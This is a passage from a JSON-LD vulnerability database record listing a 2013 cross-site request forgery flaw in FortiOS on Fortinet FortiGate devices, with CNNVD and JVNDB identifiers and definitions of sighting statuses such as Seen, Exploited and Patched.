}, { "date": "2013-07-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-116" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-116" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fortinet FortiGate Runs on the device FortiOS Vulnerable to cross-site request forgery", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003232" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-116" } ], "trust": 0.6 } }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.